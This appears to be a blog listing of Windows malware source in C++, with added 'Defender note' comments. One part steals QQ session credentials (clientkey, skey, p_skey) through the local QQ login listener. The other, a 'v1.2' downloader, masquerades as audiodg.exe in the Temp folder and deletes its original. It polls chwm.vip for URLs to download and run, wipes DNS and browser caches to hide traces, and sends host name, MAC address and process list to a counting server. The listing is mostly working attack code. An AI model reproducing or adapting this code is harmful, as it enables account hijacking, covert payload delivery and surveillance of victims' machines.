bRet = HttpQueryInfo(hHttpRequest, HTTP_QUERY_STATUS_CODE | HTTP_QUERY_FLAG_NUMBER, &dwRetCode, &dwSizeOfRq, NULL);
if (bRet){
// Read the complete response headers into a 1024-byte buffer.
char lpHeaderBuffer[1024] = { 0 };
dwSizeOfRq = 1024;
HttpQueryInfo(hHttpRequest, HTTP_QUERY_RAW_HEADERS, lpHeaderBuffer, &dwSizeOfRq, NULL);
// Extract the pt_local_token value: scan backwards from the end of the headers
// for "pt_local_token=", step past the name and '=', and cut at the next ';'.
char* pt_local_token = lpHeaderBuffer + dwSizeOfRq;
while (pt_local_token != lpHeaderBuffer){
if (strstr(pt_local_token, "pt_local_token=")){
pt_local_token += sizeof("pt_local_token");
char* pEndBuffer = strstr(pt_local_token, ";");
*pEndBuffer = 0;
break;
}
pt_local_token--;
}
// Close the handles.
InternetCloseHandle(hHttpRequest);
InternetCloseHandle(hHttpSession);
cout << "[+] pt_local_token:" << pt_local_token << "\r\n" << endl;
}
}
}
}
}
二次会话(获取本机已登录的 QQ uin):
/* Second session: ask for the QQ account number (uin) that is logged in on this machine. */
// This excerpt continues the first one and reuses its variables (hInternet,
// hHttpSession, hHttpRequest, bRet, dwRetCode, dwSizeOfRq, pt_local_token); as
// printed, its closing braces do not balance its opening ones.
// Defender note: the request goes to the host "localhost.ptlogin2.weiyun.com" on
// port 4301 with a fixed Referer header. NOTE(review): the host name suggests a
// listener of the locally running QQ client — confirm. Connections to that port from
// a process that is not a browser are the detection point.
// Generate 16 random decimal digits ('0'-'4' or '5'-'9' per position).
time_t seed = time(NULL);
srand((unsigned)seed);
CString szRand1 = "", szRand2 = "";
for (int j = 0; j < 16; j++)
{
switch ((rand() % 2))
{
case 1:
szRand1.Format("%C", rand() % 5 + 48);
break;
default:
szRand1.Format("%C", rand() % 5 + 53);
}
szRand2 += szRand1;
Sleep(50);
}
char *szRandNum = szRand2.GetBuffer(szRand2.GetLength() + 1);
szRand2.ReleaseBuffer();
// Build the request path.
char lpszUrlPath[1024] = { 0 };
strcat(lpszUrlPath, "/pt_get_uins?callback=ptui_getuins_CB&r=0.");
strcat(lpszUrlPath, szRandNum); // append the 16 random digits
strcat(lpszUrlPath, "&pt_local_tk=");
strcat(lpszUrlPath, pt_local_token); // append pt_local_token
// Open the connection.
hHttpSession = InternetConnectA(hInternet, "localhost.ptlogin2.weiyun.com", 4301, NULL, NULL, INTERNET_SERVICE_HTTP, 0, 0);
if (NULL != hHttpSession)
{
hHttpRequest = HttpOpenRequestA(hHttpSession, "GET", lpszUrlPath, NULL, "", NULL, INTERNET_FLAG_SECURE, 0);
if (NULL != hHttpRequest)
{
// Send the HTTP request with the extra header.
char lpHeaders[] = "Referer:https://ssl.xui.ptlogin2.weiyun.com/";
bRet = HttpSendRequestA(hHttpRequest, lpHeaders, strlen(lpHeaders), NULL, 0);
if (bRet)
{
// Query the HTTP status code.
dwRetCode = 0;
dwSizeOfRq = sizeof(DWORD);
bRet = HttpQueryInfo(hHttpRequest, HTTP_QUERY_STATUS_CODE | HTTP_QUERY_FLAG_NUMBER, &dwRetCode, &dwSizeOfRq, NULL);
if (bRet)
{
// Ask how many bytes of response data are available.
DWORD dwNumberOfBytesAvailable = 0;
bRet = InternetQueryDataAvailable(hHttpRequest, &dwNumberOfBytesAvailable, NULL, NULL);
if (bRet)
{
// Read the response body into a zero-initialised buffer.
char* lpBuffer = new char[dwNumberOfBytesAvailable + 1]();
bRet = InternetReadFile(hHttpRequest, lpBuffer, dwNumberOfBytesAvailable, &dwNumberOfBytesAvailable);
if (bRet)
{
// Extract the uin: scan backwards for "uin": and cut at the next '}'.
char* uin = lpBuffer + dwNumberOfBytesAvailable;
while (uin != lpBuffer)
{
if (strstr(uin, "\"uin\":"))
{
uin += sizeof("\"uin\":") - 1;
char* pEndBuffer = strstr(uin, "}");
*pEndBuffer = 0;
break;
}
uin--;
}
// Close the handles.
InternetCloseHandle(hHttpRequest);
InternetCloseHandle(hHttpSession);
cout << "[+] uin:" << uin << "\r\n" << endl;
delete[] lpBuffer;
}
}
}
}
}
三次会话(截取 QQ ClientKey):
/* Third session: request the ClientKey for the account found in the second session. */
// Continues the earlier excerpts and reuses their variables (lpszUrlPath, uin,
// pt_local_token, lpHeaderBuffer and the WinINet handles).
// Defender note: same endpoint as the second session (port 4301, fixed Referer).
// The value returned here is a session credential, so its disclosure should be
// handled like a stolen login session for the affected account.
// Build the request path.
ZeroMemory(lpszUrlPath, 1024);
strcat(lpszUrlPath, "/pt_get_st?clientuin=");
strcat(lpszUrlPath, uin);
strcat(lpszUrlPath, "&pt_local_tk=");
strcat(lpszUrlPath, pt_local_token);
// Send the HTTPS request.
hHttpSession = InternetConnectA(hInternet, "localhost.ptlogin2.weiyun.com", 4301, NULL, NULL, INTERNET_SERVICE_HTTP, 0, 0);
if (NULL != hHttpSession)
{
hHttpRequest = HttpOpenRequestA(hHttpSession, "GET", lpszUrlPath, NULL, "", NULL, INTERNET_FLAG_SECURE, 0);
if (NULL != hHttpRequest)
{
// Add the extra header.
char lpHeaders2[] = "Referer:https://ssl.xui.ptlogin2.weiyun.com/";
bRet = HttpSendRequestA(hHttpRequest, lpHeaders2, strlen(lpHeaders2), NULL, 0);
if (bRet)
{
// Query the HTTP status code.
dwRetCode = 0;
dwSizeOfRq = sizeof(DWORD);
bRet = HttpQueryInfoA(hHttpRequest, HTTP_QUERY_STATUS_CODE | HTTP_QUERY_FLAG_NUMBER, &dwRetCode, &dwSizeOfRq, NULL);
if (bRet)
{
// Read the complete response headers.
ZeroMemory(lpHeaderBuffer, 1024);
dwSizeOfRq = 1024;
bRet = HttpQueryInfoA(hHttpRequest, HTTP_QUERY_RAW_HEADERS, lpHeaderBuffer, &dwSizeOfRq, NULL);
if (bRet)
{
// Extract the clientkey value: scan backwards for "clientkey=" and cut at the next ';'.
char* clientkey = lpHeaderBuffer + dwSizeOfRq;
while (clientkey != lpHeaderBuffer)
{
if (strstr(clientkey, "clientkey="))
{
clientkey += sizeof("clientkey");
char* pEndBuffer = strstr(clientkey, ";");
*pEndBuffer = 0;
break;
}
clientkey--;
}
// Close the handles.
InternetCloseHandle(hHttpRequest);
InternetCloseHandle(hHttpSession);
cout << "[+] clientkey:" << clientkey << "\r\n" << endl;
}
}
}
}
}
四次会话(获取 Skey 并提取 ptsigx 的值):
/* Fourth session: exchange uin and clientkey for a skey and pick up the ptsigx value. */
// Continues the earlier excerpts and reuses their variables (lpszUrlPath, uin,
// clientkey, lpHeaderBuffer and the WinINet handles).
// Defender note: this is the first request of the sequence that leaves the host
// carrying the credential (to ptlogin2.qq.com), with the clientkey in the query
// string of the request path.
// Build the request path.
ZeroMemory(lpszUrlPath, 1024);
strcat(lpszUrlPath, "/jump?clientuin=");
strcat(lpszUrlPath, uin);
strcat(lpszUrlPath, "&clientkey=");
strcat(lpszUrlPath, clientkey);
strcat(lpszUrlPath, "&keyindex=9&u1=https://www.weiyun.com/web/callback/common_qq_login_ok.html?login_succ&pt_local_tk=&pt_3rd_aid=0&ptopt=1&style=40");
// Send the HTTPS request.
hHttpSession = InternetConnectA(hInternet, "ptlogin2.qq.com", INTERNET_DEFAULT_HTTPS_PORT, NULL, NULL, INTERNET_SERVICE_HTTP, 0, 0);
if (NULL != hHttpSession)
{
hHttpRequest = HttpOpenRequestA(hHttpSession, "GET", lpszUrlPath, NULL, "", NULL, INTERNET_FLAG_SECURE, 0);
if (NULL != hHttpRequest)
{
// Add the Referer header.
char lpReferer[128] = { 0 };
strcpy(lpReferer, "Referer: ");
strcat(lpReferer, "https://ptlogin2.qq.com/");
strcat(lpReferer, "\r\n");
HttpAddRequestHeaders(hHttpRequest, lpReferer, -1L, HTTP_ADDREQ_FLAG_ADD);
bRet = HttpSendRequestA(hHttpRequest, NULL, NULL, NULL, 0);
if (bRet)
{
// Query the HTTP status code.
dwRetCode = 0;
dwSizeOfRq = sizeof(DWORD);
bRet = HttpQueryInfoA(hHttpRequest, HTTP_QUERY_STATUS_CODE | HTTP_QUERY_FLAG_NUMBER, &dwRetCode, &dwSizeOfRq, NULL);
if (bRet)
{
// Ask how many bytes of response data are available.
DWORD dwNumberOfBytesAvailablex = 0;
InternetQueryDataAvailable(hHttpRequest, &dwNumberOfBytesAvailablex, NULL, NULL);
// Read the response body.
char* lpBufferx = new char[dwNumberOfBytesAvailablex + 1]();
InternetReadFile(hHttpRequest, lpBufferx, dwNumberOfBytesAvailablex, &dwNumberOfBytesAvailablex);
// Print the response body.
cout << "[+] Response Data:" << lpBufferx << "\r\n" << endl;
// Extract ptsigx from the body for the next session: scan backwards for
// "check_sig?" and cut at the next single quote.
char* ptsigx = lpBufferx + dwNumberOfBytesAvailablex;
while (ptsigx != lpBufferx)
{
if (strstr(ptsigx, "check_sig?"))
{
ptsigx += sizeof("check_sig");
char* pEndBuffer = strstr(ptsigx, "'");
*pEndBuffer = 0;
break;
}
ptsigx--;
}
// Build the request path for the next session.
CString szPtsigx = "";
szPtsigx.Format(TEXT("/check_sig?%s"), ptsigx);
cout << "[+] szPtsigx:" << szPtsigx << "\r\n" << endl;
delete[] lpBufferx;
// Read the complete response headers.
ZeroMemory(lpHeaderBuffer, 1024);
dwSizeOfRq = 1024;
HttpQueryInfoA(hHttpRequest, HTTP_QUERY_RAW_HEADERS_CRLF, lpHeaderBuffer, &dwSizeOfRq, NULL);
// Extract the skey value: scan backwards for "skey=" and cut at the next ';'.
char* skey = lpHeaderBuffer + dwSizeOfRq;
while (skey != lpHeaderBuffer)
{
if (strstr(skey, "skey="))
{
skey += sizeof("skey");
char* pEndBuffer = strstr(skey, ";");
*pEndBuffer = 0;
break;
}
skey--;
}
// Close the handles.
InternetCloseHandle(hHttpRequest);
InternetCloseHandle(hHttpSession);
cout << "[+] Skey:" << skey << "\r\n" << endl;
}
}
}
}
五次会话(获取 P_skey):
/* Fifth session: follow the check_sig path from the fourth session and read p_skey. */
// Continues the earlier excerpts and reuses their variables (szPtsigx,
// lpHeaderBuffer and the WinINet handles). Unlike the other sessions, the request
// and session handles are not closed in this excerpt.
char *u_Ptsigx = szPtsigx.GetBuffer(szPtsigx.GetLength() + 1);
szPtsigx.ReleaseBuffer();
// Send the HTTPS request.
hHttpSession = InternetConnectA(hInternet, "ssl.ptlogin2.weiyun.com", INTERNET_DEFAULT_HTTPS_PORT, NULL, NULL, INTERNET_SERVICE_HTTP, 0, 0);
if (NULL != hHttpSession)
{
hHttpRequest = HttpOpenRequestA(hHttpSession, "GET", u_Ptsigx, NULL, "", NULL, INTERNET_FLAG_SECURE, 0);
if (NULL != hHttpRequest)
{
bRet = HttpSendRequestA(hHttpRequest, NULL, NULL, NULL, 0);
if (bRet)
{
// Query the HTTP status code.
dwRetCode = 0;
dwSizeOfRq = sizeof(DWORD);
bRet = HttpQueryInfoA(hHttpRequest, HTTP_QUERY_STATUS_CODE | HTTP_QUERY_FLAG_NUMBER, &dwRetCode, &dwSizeOfRq, NULL);
if (bRet)
{
// Read the complete response headers.
ZeroMemory(lpHeaderBuffer, 1024);
dwSizeOfRq = 1024;
HttpQueryInfoA(hHttpRequest, HTTP_QUERY_RAW_HEADERS_CRLF, lpHeaderBuffer, &dwSizeOfRq, NULL);
// Extract the p_skey value: scan backwards for "p_skey=" and cut at the next ';'.
char* pskey = lpHeaderBuffer + dwSizeOfRq;
while (pskey != lpHeaderBuffer)
{
if (strstr(pskey, "p_skey="))
{
pskey += sizeof("p_skey");
char* pEndBuffer = strstr(pskey, ";");
*pEndBuffer = 0;
break;
}
pskey--;
}
cout << "[+] P_skey:" << pskey << "\r\n" << endl;
}
}
}
}
代码更新 —— 2023.09.25 v1.2 版 (添加劫持QQ Key模块)
// downloader.cpp : 定义控制台应用程序的入口点。
//
#include "stdafx.h"
#include "downloader.h"
#ifdef _DEBUG
#define new DEBUG_NEW
#endif
#pragma comment( linker, "/subsystem:windows /entry:mainCRTStartup" )
// Function-pointer types for Win32 APIs that main() resolves at run time through
// LoadLibrary/GetProcAddress ("CopyFileA", "ShellExecuteA") instead of calling them
// directly. XXXDL and the two WinINet types are not used in the part of the v1.2
// listing shown here.
typedef BOOL(_stdcall *XXXCY)(LPCTSTR, LPCTSTR, BOOL);
typedef HINSTANCE(_stdcall *XXXCute)(HWND, LPCTSTR, LPCTSTR, LPCTSTR, LPCTSTR, int);
typedef HRESULT(_stdcall *XXXDL)(LPUNKNOWN, LPCSTR, LPCSTR, DWORD, LPBINDSTATUSCALLBACK);
typedef HINTERNET(_stdcall *XXXInternetOpen)(LPCTSTR, DWORD, LPCTSTR, LPCTSTR, DWORD);
typedef HINTERNET(_stdcall *XXXInternetOpenUrl)(HINTERNET, LPCTSTR, LPCTSTR, DWORD, DWORD, DWORD);
// Forward declarations. New compared with v1.1: DownloadToFile and the
// GetQQClientKey thread routine; DelSlef is renamed to DelSelf.
BOOL DelSelf();
BOOL DelTempFiles();
BOOL GetProcessName(LPCTSTR szProcess);
CString GetAllProcessNames();
BOOL DownloadToFile(TCHAR *szEXEURL, TCHAR *szEXESaveFile);
BOOL SendDataToCount();
BOOL PostDataToCount(TCHAR *szPostURL, TCHAR *szState1, TCHAR *szState2, TCHAR *szState3);
void GetWinOS();
BOOL IsWow64OSEx();
CString GetMacAddress(void);
static DWORD WINAPI GetQQClientKey(LPVOID pParam);
// Hard-coded configuration. Both URLs are network indicators for this sample.
TCHAR szLBFile[MAX_PATH] = "https://www.chwm.vip/load.swf"; // URL of the remote list file ("process|url" lines, parsed in main)
TCHAR szCountUrl[MAX_PATH] = "https://www.chwm.vip/count.php"; // URL of the statistics (check-in) endpoint
TCHAR szVersion[MAX_PATH] = "1.2"; // program version
TCHAR szUserID[MAX_PATH] = "admin"; // customer id; also used as the mutex name in main
TCHAR szLBSaveFile[MAX_PATH] = { 0 }; // local path the list file is saved to
TCHAR szEXESaveFile[MAX_PATH] = { 0 }; // directory downloaded programs are saved in
TCHAR szSelfFilePath[MAX_PATH] = { 0 }; // full path of the running executable
TCHAR szSelfSaveFile[MAX_PATH] = { 0 }; // path the program copies itself to
TCHAR osx[MAX_PATH] = { 0 }; // OS version string
// URLs that were already downloaded and started. The original comment says "10M";
// the array is 10240 TCHARs (about 10 KB when TCHAR is char, which the strstr calls imply).
TCHAR CGLB[10240] = { 0 };
BOOL TJ = FALSE; // becomes TRUE once SendDataToCount() has succeeded
BOOL ReStart = FALSE; // becomes TRUE when a command-line argument contains "ReStart"
// The one and only application object
CWinApp theApp;
using namespace std;
// Entry point of the v1.2 sample. Same flow as v1.1 with two changes visible here:
// downloads go through DownloadToFile() (declared above, defined outside this part
// of the listing), and after the first successful check-in a GetQQClientKey thread
// is started once.
//   1. Without a "ReStart" argument: copy self into %LOCALAPPDATA%\Temp (audiodg.exe,
//      or a random 16-character name when that file exists), start the copy with
//      " ReStart", delete the original through DelSelf() and exit.
//   2. With "ReStart": take a named mutex, then loop once per minute: fetch the list,
//      and for each "process|url" line whose process is running and whose URL is not
//      yet in CGLB, download the URL to a random .EXE name and open it.
// Defender note: the indicators are the same as for v1.1 (Temp\audiodg.exe, the
// "ReStart" argument, the mutex named after szUserID, the one-minute request to
// szLBFile, children started from 16-character [0-9A-F] .EXE names).
int main(int argc, char *argv[])
{
// Not referenced again in this function; presumably a build marker — confirm.
CString Encryption_Point = "****** 2023.09.25 ******";
// Substring match over every argument, argv[0] included.
for (int i = 0; i < argc; i++)
{
if (strstr(argv[i], "ReStart"))
{
ReStart = TRUE;
}
}
// Full path of the running executable.
GetModuleFileName(NULL, szSelfFilePath, MAX_PATH);
// Resolve the per-user local application data directory (CSIDL_LOCAL_APPDATA /
// FOLDERID_LocalAppData, shell version 5.0: the file-system directory that serves as
// a data repository for local, non-roaming applications).
// Typical path: C:\Documents and Settings\username\Local Settings\Application Data
SHGetSpecialFolderPath(NULL, szLBSaveFile, CSIDL_LOCAL_APPDATA, TRUE);
SHGetSpecialFolderPath(NULL, szEXESaveFile, CSIDL_LOCAL_APPDATA, TRUE);
SHGetSpecialFolderPath(NULL, szSelfSaveFile, CSIDL_LOCAL_APPDATA, TRUE);
lstrcat(szLBSaveFile, "\\Temp\\Load.tmp");
lstrcat(szEXESaveFile, "\\Temp");
// audiodg.exe is also the name of a Windows system component that normally lives
// in System32; the same name under %LOCALAPPDATA%\Temp is a masquerading indicator.
lstrcat(szSelfSaveFile, "\\Temp\\audiodg.exe");
if ( !ReStart )
{
// Query the attributes of the target path to find out whether it already exists.
DWORD dwFileAttr = GetFileAttributes(szSelfSaveFile);
// INVALID_FILE_ATTRIBUTES: the audiodg.exe copy is not there yet.
if (dwFileAttr == INVALID_FILE_ATTRIBUTES)
{
// Copy self; CopyFileA is looked up by name at run time.
XXXCY cy;
HMODULE hkernel;
hkernel = LoadLibrary(_T("kernel32.dll"));
cy = (XXXCY)GetProcAddress(hkernel, "CopyFileA");
if (cy != NULL)
{
cy(szSelfFilePath, szSelfSaveFile, FALSE);
}
cy = NULL;
FreeLibrary(hkernel);
Sleep(500);
// Start the copy with the marker argument, remove the original, and exit.
lstrcat(szSelfSaveFile, " ReStart");
WinExec(szSelfSaveFile, SW_SHOW);
DelSelf();
exit(0);
}
else
{
CString szSelfRandomName = NULL;
CString szRand1 = NULL, szRand2 = NULL;
// Build a 16-character random name from digits '0'-'9' and letters 'A'-'F'.
time_t seed = time(NULL);
srand((unsigned)seed);
for (int j = 0; j < 16; j++)
{
switch ((rand() % 2))
{
case 1:
szRand1.Format("%C", rand() % 10 + 48);
break;
default:
szRand1.Format("%C", rand() % 6 + 65);
}
szRand2 += szRand1;
Sleep(100);
}
szSelfRandomName.Format(TEXT("\\%s.EXE"), szRand2);
TCHAR *szSelfRandomNames = szSelfRandomName.GetBuffer(szSelfRandomName.GetLength() + 1);
szSelfRandomName.ReleaseBuffer();
// Target becomes <LocalAppData>\Temp\<random>.EXE
lstrcpy(szSelfSaveFile, szEXESaveFile);
lstrcat(szSelfSaveFile, szSelfRandomNames);
// Copy self, same run-time lookup as in the branch above.
XXXCY cy;
HMODULE hkernel;
hkernel = LoadLibrary(_T("kernel32.dll"));
cy = (XXXCY)GetProcAddress(hkernel, "CopyFileA");
if (cy != NULL)
{
cy(szSelfFilePath, szSelfSaveFile, FALSE);
}
cy = NULL;
FreeLibrary(hkernel);
Sleep(500);
lstrcat(szSelfSaveFile, " ReStart");
WinExec(szSelfSaveFile, SW_SHOW);
DelSelf();
exit(0);
}
}
// Create a named mutex so that only one instance keeps running.
// The mutex name is szUserID, which makes it a host-based indicator.
SetLastError(0);
HANDLE g_hMutex = ::CreateMutex(NULL, FALSE, szUserID);
if (GetLastError() == ERROR_ALREADY_EXISTS)
{
exit(0);
}
// Main work loop; one pass per minute (see the Sleep at the bottom).
do{
// Flush the DNS cache and delete WinINet cache entries (see DelTempFiles).
DelTempFiles();
// Download the remote list file; the list is parsed only when that succeeds.
if ( DownloadToFile(szLBFile, szLBSaveFile) )
{
CString myText = NULL;
TCHAR Buffer[MAX_PATH] = { 0 };
// Read the saved list line by line.
FILE *TK = fopen(szLBSaveFile, "r+");
while (fgets(Buffer, sizeof(Buffer), TK) != NULL)
{
myText.Format("%s", Buffer);
//AfxMessageBox(myText);
CString szProcess = NULL, szURL = NULL;
// 0-based index of the first '|' in myText (the original comment said "comma");
// Find returns -1 when there is none.
int pos = myText.Find("|");
if (pos >= 0)
{
// Everything left of the '|' is the process name to look for.
szProcess.Format("%s", myText.Left(pos));
//AfxMessageBox(szProcess);
// Everything right of the '|' is the download URL.
szURL.Format("%s", myText.Mid(pos + 1));
//AfxMessageBox(szURL);
TCHAR *TargetURL = szURL.GetBuffer(szURL.GetLength() + 1);
szURL.ReleaseBuffer();
// Skip URLs that are already recorded in the success list.
if ( !strstr(CGLB, TargetURL) )
{
// Act only when a process with the listed name is running on this host.
if ( GetProcessName(szProcess) )
{
CString myEXESaveFile = NULL;
CString szRand1 = NULL, szRand2 = NULL;
// 16-character random file name from [0-9A-F], same scheme as above.
time_t seed = time(NULL);
srand((unsigned)seed);
for (int j = 0; j < 16; j++)
{
switch ((rand() % 2))
{
case 1:
szRand1.Format("%C", rand() % 10 + 48);
break;
default:
szRand1.Format("%C", rand() % 6 + 65);
}
szRand2 += szRand1;
Sleep(100);
}
myEXESaveFile.Format(TEXT("%s\\%s.EXE"), szEXESaveFile, szRand2);
//AfxMessageBox(myEXESaveFile);
TCHAR *TargetFile = myEXESaveFile.GetBuffer(myEXESaveFile.GetLength() + 1);
myEXESaveFile.ReleaseBuffer();
// Download the listed EXE and open it.
if ( DownloadToFile(TargetURL, TargetFile) )
{
// ShellExecuteA is looked up by name at run time.
HMODULE hshell;
hshell = LoadLibrary(_T("shell32.dll"));
XXXCute cute;
cute = (XXXCute)GetProcAddress(hshell, "ShellExecuteA");
if (cute != NULL)
{
HINSTANCE hNewExe = cute(NULL, "open", TargetFile, NULL, NULL, SW_SHOW);
// ShellExecute reports success with a value greater than 32.
if ((DWORD)hNewExe > 32)
{
// Downloaded and started: remember the URL in the success list
// so it is not downloaded again.
lstrcat(CGLB, TargetURL);
}
}
cute = NULL;
FreeLibrary(hshell);
}
}
}
}
}
fclose(TK);
// The saved list is removed after every pass.
DeleteFile(szLBSaveFile);
}
if ( !TJ )
{
// Send the host statistics; repeated on each pass until it succeeds once.
if ( SendDataToCount() )
{
TJ = TRUE;
// Ask the shell to refresh its icon cache.
SHChangeNotify(SHCNE_ASSOCCHANGED, SHCNF_FLUSHNOWAIT, NULL, NULL);
// Start the GetQQClientKey thread; because TJ is now TRUE this happens once.
// The returned thread handle is not kept.
DWORD dwThreadId1;
CreateThread(NULL, 0, GetQQClientKey, NULL, 0, &dwThreadId1);
}
}
// Wait one minute,
// then run the next pass.
Sleep(60000);
} while (1);
return 0;
}
// Deletes the running executable from disk by handing the job to the command
// interpreter: it starts %COMSPEC% hidden with `/c del "<short path of self>" > nul`.
// Returns TRUE when the command interpreter was started, FALSE otherwise.
// Defender note: a hidden cmd.exe child whose command line is `/c del "<path>" > nul`
// and whose parent image is the file being deleted is the process-creation event
// to look for.
BOOL DelSelf()
{
SHELLEXECUTEINFO sei;
TCHAR szModule[MAX_PATH], szComspec[MAX_PATH], szParams[MAX_PATH];
// Get our own file name (converted to its short 8.3 form) and the full path of
// the command interpreter from the COMSPEC environment variable.
if ((GetModuleFileName(0, szModule, MAX_PATH) != 0) &&
(GetShortPathName(szModule, szModule, MAX_PATH) != 0) &&
(GetEnvironmentVariable("COMSPEC", szComspec, MAX_PATH) != 0)) {
// Build the parameter string: /c del "<module>" > nul
lstrcpy(szParams, "/c del ");
lstrcat(szParams, "\"");
lstrcat(szParams, szModule);
lstrcat(szParams, "\"");
lstrcat(szParams, " > nul");
sei.cbSize = sizeof(sei);
sei.hwnd = 0;
sei.lpVerb = "Open";
sei.lpFile = szComspec;
sei.lpParameters = szParams;
sei.lpDirectory = 0; sei.nShow = SW_HIDE;
// Ask for the process handle so the priority calls below can use it.
sei.fMask = SEE_MASK_NOCLOSEPROCESS;
if (ShellExecuteEx(&sei)) {
// Set the command interpreter process to NORMAL priority.
SetPriorityClass(sei.hProcess, NORMAL_PRIORITY_CLASS);
// Raise the priority of our own process and thread to the maximum.
SetPriorityClass(GetCurrentProcess(), REALTIME_PRIORITY_CLASS);
SetThreadPriority(GetCurrentThread(), THREAD_PRIORITY_TIME_CRITICAL);
// Tell the shell that the file has been deleted.
SHChangeNotify(SHCNE_DELETE, SHCNF_PATH, szModule, 0);
return TRUE;
}
}
return FALSE;
}
// DelTempFiles: clears local traces of network activity.
// First launches `ipconfig.exe /flushdns` hidden, then walks the WinINet URL
// cache and deletes every entry that is not a cookie entry.
// Always returns TRUE; bResult is assigned but never returned.
// Defender note: this is trace removal. After it runs, the DNS resolver cache
// and the WinINet cache no longer show what was fetched, so an investigation
// has to rely on network or endpoint telemetry recorded elsewhere. A hidden
// `ipconfig /flushdns` started by an unrelated program is itself a useful signal.
BOOL DelTempFiles()
{
ShellExecute(NULL, "open", "ipconfig.exe", " /flushdns", NULL, SW_HIDE);
BOOL bResult = FALSE;
BOOL bDone = FALSE;
LPINTERNET_CACHE_ENTRY_INFO lpCacheEntry = NULL;
DWORD dwTrySize, dwEntrySize = 4096; // start buffer size
HANDLE hCacheDir = NULL;
// Starting in the "buffer too small" state makes the first pass allocate the
// buffer and call FindFirstUrlCacheEntry.
DWORD dwError = ERROR_INSUFFICIENT_BUFFER;
do
{
switch (dwError)
{
// need a bigger buffer (also the initial state, see above)
case ERROR_INSUFFICIENT_BUFFER:
delete[] lpCacheEntry;
lpCacheEntry = (LPINTERNET_CACHE_ENTRY_INFO) new char[dwEntrySize];
lpCacheEntry->dwStructSize = dwEntrySize;
dwTrySize = dwEntrySize;
BOOL bSuccess;
// No enumeration handle yet: start one; otherwise retry the next entry
// with the enlarged buffer.
if (hCacheDir == NULL)
bSuccess = (hCacheDir
= FindFirstUrlCacheEntry(NULL, lpCacheEntry,
&dwTrySize)) != NULL;
else
bSuccess = FindNextUrlCacheEntry(hCacheDir, lpCacheEntry, &dwTrySize);
if (bSuccess)
dwError = ERROR_SUCCESS;
else
{
dwError = GetLastError();
dwEntrySize = dwTrySize; // use new size returned
}
break;
// we are done
case ERROR_NO_MORE_ITEMS:
bDone = TRUE;
bResult = TRUE;
break;
// we have got an entry
case ERROR_SUCCESS:
// don't delete cookie entry
if (!(lpCacheEntry->CacheEntryType & COOKIE_CACHE_ENTRY))
DeleteUrlCacheEntry(lpCacheEntry->lpszSourceUrlName);
// get ready for next entry
dwTrySize = dwEntrySize;
if (FindNextUrlCacheEntry(hCacheDir, lpCacheEntry, &dwTrySize))
dwError = ERROR_SUCCESS;
else
{
dwError = GetLastError();
dwEntrySize = dwTrySize; // use new size returned
}
break;
// unknown error
default:
bDone = TRUE;
break;
}
// On exit, release the entry buffer and the enumeration handle
if (bDone)
{
delete[]lpCacheEntry;
if (hCacheDir)
FindCloseUrlCache(hCacheDir);
}
} while (!bDone);
return TRUE;
}
// GetProcessName: reports whether a process with the given executable name is running.
// szProcess - executable file name to look for; the comparison is case-insensitive
//             because both sides are lower-cased first.
// Returns TRUE on the first match in a Toolhelp process snapshot, FALSE otherwise.
// Defender note: process-list checks like this let a program act only when a
// particular application is present, so a sandbox without that application
// may never see the dependent behaviour.
BOOL GetProcessName(LPCTSTR szProcess)
{
HANDLE hShot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
// dwSize must be set before Process32First; the remaining fields start at zero
PROCESSENTRY32 pe32x = { sizeof(PROCESSENTRY32),0 };
if (Process32First(hShot, &pe32x))
{
CString TargetName = NULL;
TargetName.Format(TEXT("%s"), szProcess);
TargetName.MakeLower();
do {
CString ProcessName = NULL;
ProcessName.Format("%s", pe32x.szExeFile);
ProcessName.MakeLower();
if (ProcessName == TargetName)
{
CloseHandle(hShot);
return TRUE;
}
} while (Process32Next(hShot, &pe32x));
}
CloseHandle(hShot);
return FALSE;
}
// GetAllProcessNames: returns the executable names of all processes in a
// Toolhelp snapshot as one string, each name followed by "|".
// Returns an empty string when the snapshot yields no first entry.
// Defender note: the full process list is host-inventory data; it tells the
// recipient which security products and applications are running.
CString GetAllProcessNames()
{
CString AllProcessNames = "";
HANDLE hShot2 = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
PROCESSENTRY32 pe32 = { sizeof(PROCESSENTRY32),0 };
if (Process32First(hShot2, &pe32))
{
do {
// Local CString; it shares its name with the GetProcessName function but is unrelated to it
CString GetProcessName = "";
GetProcessName.Format(TEXT("%s"), pe32.szExeFile);
AllProcessNames += GetProcessName;
AllProcessNames += "|";
} while (Process32Next(hShot2, &pe32));
}
CloseHandle(hShot2);
return AllProcessNames;
}
// DownloadToFile: fetches a URL to a local file through URLDownloadToFileA.
// szEXEURL      - source URL
// szEXESaveFile - destination path on disk
// Returns TRUE only when the call returns S_OK; FALSE when the export cannot
// be resolved or the download fails.
// The API is resolved at run time from urlmon.dll with GetProcAddress instead
// of being linked. The library reference is released only on the FALSE path.
// Defender note: because of the run-time lookup, this use of URLDownloadToFileA
// does not appear in the import table. Static triage should look for the
// "urlmon.dll" and "URLDownloadToFileA" strings, and dynamic analysis for the
// module load followed by a new file on disk.
BOOL DownloadToFile(TCHAR *szEXEURL, TCHAR *szEXESaveFile)
{
XXXDL kkkkkkk;
HMODULE hurlmon;
hurlmon = LoadLibrary(_T("urlmon.dll"));
kkkkkkk = (XXXDL)GetProcAddress(hurlmon, "URLDownloadToFileA");
if (kkkkkkk != NULL)
{
HRESULT hRes = kkkkkkk(NULL, szEXEURL, szEXESaveFile, 0, NULL);
if (hRes == S_OK)
{
return TRUE;
}
}
kkkkkkk = NULL;
FreeLibrary(hurlmon);
return FALSE;
}
// SendDataToCount: reports this host to the statistics endpoint in szCountUrl.
// Collects the host name, the OS product name (via GetWinOS, into the global
// osx), a MAC address and the full process list, and sends them as the query
// string of a single URL:
//   ?jc=<process list>&ver=<szVersion>&ID=<szUserID>&MN=<host name>&os=<osx>&mac=<MAC>
// Returns TRUE when the first read of the response contains "Fail", "Success"
// or "Repeat". If none is present, it retries through PostDataToCount with a
// shorter URL that omits the process list and sends the host name as CP= instead of MN=.
// Returns FALSE when the session or URL cannot be opened or the read fails.
// Defender note: the parameter names (jc, ver, ID, MN or CP, os, mac) in a GET
// query string, with a "|"-separated process list in jc, form a stable network
// signature for proxy and IDS rules. The fallback host-name markers "unkonw1"
// and "unkonw2" are literal strings in the binary.
BOOL SendDataToCount()
{
TCHAR dat[10240] = { 0 };
TCHAR jsj[MAX_PATH] = { 0 };
WSADATA _wsaData = { 0 };
ZeroMemory(dat, 10240 * sizeof(TCHAR));
ZeroMemory(jsj, MAX_PATH * sizeof(TCHAR));
